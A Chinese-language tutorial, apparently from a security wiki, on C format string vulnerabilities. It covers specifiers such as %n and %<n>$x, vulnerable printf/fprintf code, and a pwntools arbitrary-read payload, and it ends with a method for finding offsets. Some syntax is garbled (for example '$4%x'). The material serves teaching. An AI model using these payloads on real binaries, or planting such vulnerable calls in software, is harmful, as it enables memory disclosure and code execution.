Format Strings
基本信息
在C语言中,printf
是一个用于打印字符串的函数。该函数期望的第一个参数是带有格式化符号的原始文本。接下来期望的参数是要从原始文本中替换格式化符号的值。
其他存在漏洞的函数包括**sprintf()
和fprintf()
**。
当将攻击者文本用作该函数的第一个参数时,漏洞就会出现。攻击者将能够通过滥用printf格式字符串的功能来构建一个特殊输入,以读取和写入任何地址的任何数据(可读/可写)。从而能够执行任意代码。
格式化符号:
%08x —> 8 hex bytes
%d —> Entire
%u —> Unsigned
%s —> String
%p —> Pointer
%n —> Number of written bytes
%hn —> Occupies 2 bytes instead of 4
<n>$X —> Direct access, Example: ("%3$d", var1, var2, var3) —> Access to var3
示例:
漏洞示例:
char buffer[30];
gets(buffer); // Dangerous: takes user input without restrictions.
printf(buffer); // If buffer contains "%x", it reads from the stack.
正常使用:
int value = 1205;
printf("%x %x %x", value, value, value); // Outputs: 4b5 4b5 4b5
缺少参数时:
printf("%x %x %x", value); // Unexpected output: reads random values from the stack.
fprintf易受攻击:
#include <stdio.h>
int main(int argc, char *argv[]) {
char *user_input;
user_input = argv[1];
FILE *output_file = fopen("output.txt", "w");
fprintf(output_file, user_input); // The user input cna include formatters!
fclose(output_file);
return 0;
}
访问指针
格式%<n>$x
,其中n
是一个数字,允许指示printf选择第n个参数(来自堆栈)。因此,如果您想使用printf读取堆栈中的第4个参数,可以执行以下操作:
printf("%x %x %x %x")
并且您将从第一个到第四个参数读取。
或者您可以执行:
printf("$4%x")
并直接读取第四个。
注意,攻击者控制pr
intf
参数,这基本上意味着他的输入将在调用printf
时位于堆栈中,这意味着他可以在堆栈中写入特定的内存地址。
控制此输入的攻击者将能够在堆栈中添加任意地址并使printf
访问它们。在下一节中将解释如何利用这种行为。
任意读取
可以使用格式化程序**%n$s
使printf
获取位于n位置的地址**,并在其后打印它,就好像它是一个字符串(打印直到找到0x00为止)。因此,如果二进制文件的基地址为**0x8048000
**,并且我们知道用户输入从堆栈的第4个位置开始,就可以打印二进制文件的开头:
from pwn import *
p = process('./bin')
payload = b'%6$s' #4th param
payload += b'xxxx' #5th param (needed to fill 8bytes with the initial input)
payload += p32(0x8048000) #6th param
p.sendline(payload)
log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||'
请注意,您不能在输入开头放置地址0x8048000,因为该地址的末尾将被0x00截断。
查找偏移量
要找到输入的偏移量,您可以发送4或8个字节(0x41414141
),然后跟随**%1$x
并增加**该值,直到检索到A's
。
最后更新于